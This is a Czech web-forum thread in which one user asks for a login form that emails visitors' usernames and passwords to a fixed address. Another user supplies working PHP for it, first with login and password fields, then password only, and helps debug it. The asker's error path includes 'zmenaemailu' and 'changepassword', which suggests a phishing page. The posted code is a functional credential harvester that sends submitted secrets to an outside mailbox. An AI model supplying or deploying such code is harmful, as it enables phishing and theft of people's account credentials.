Autor Zpráva
martinecek2000
Profil *
Dobrý den hledal jsem ale nenašel tak se vás ptám je nějak možné udělat přihlašovací box a ten box by odeslal jméno a heslo na určený email ? nejde mi o krádež nějakého id ale potřebuji to k webu je to možné ?zjistyil jsem že to možné je jenom nevím jak to napsat možná by to šlo udělat jako když se posílá email v kontaktním formuláři ale moc se v tom nevyznám.
Louka
Profil
<?php 

if(!$_POST['login'] || !$_POST['heslo'])
{
     echo "<form action=\"#\" method=\"post\"><input type=\"text\" name=\"login\" value=\"\"><br>\n";
     echo "<input type=\"password\" name=\"heslo\" value=\"\"><br>\n";
     echo "<input type=\"submit\" name=\"send\" value=\"OK\"></form>";
}
else 
{
     mail("tvuj@email.cz","Predmet","LOGIN:{$_POST['login']},\nHESLO:{$_POST['heslo']}");
}

?>
martinecek2000
Profil *
děkuji moc mi to pomohlo
martinecek2000
Profil *
Ještě se zeptám ted jsem zjistil že potřebuji jenom kolonku na heslo protože na login jsem čirou náhodou splácal dohromady prozatím jsem to poupravil ale napsalo mi to syntaxe error nevíte jak na to?
Louka
Profil
Pro zajímavost pošli znění hlášky, ať víme, kde jsi udělal chybu. Jinak úprava s odebráním kolonky login je snadná:
<?php 
 
if(!$_POST['heslo'])
{
     echo "<form action=\"#\" method=\"post\">\n";
     echo "<input type=\"password\" name=\"heslo\" value=\"\"><br>\n";
     echo "<input type=\"submit\" name=\"send\" value=\"OK\"></form>";
}
else 
{
     mail("tvuj@email.cz","Predmet","HESLO:{$_POST['heslo']}");
}
 
?>
martinecek2000
Profil *
Napsalo mi to:Parse error: syntax error, unexpected T_ECHO in /home/users/panda/zmenaemailu.8u.cz/web/changepassword/drulik/7775895368685.php on line 593
Louka
Profil
Takže jsi asi špatně upravil tu podmínku; zkus, co jsem posílal :).
martinecek2000
Profil *
Ted to zkouším
martinecek2000
Profil *
Jinak nevím topřesně ale nevíte jak vypadá kod na napojení tlačítka ? aby tam nebylo to chudé OK
Louka
Profil
<input type=\"submit\" name=\"send\" value=\"OK\"> - jestli chceš změnit OK na něco jiného, tak to přepiš tady.
jenikkozak
Profil
martinecek2000:
Něco jsi vynechal. Přeji poklidné studium.

Vaše odpověď


Prosím používejte diakritiku a interpunkci.

Ochrana proti spamu. Napište prosím číslo dvě-sta čtyřicet-sedm:

0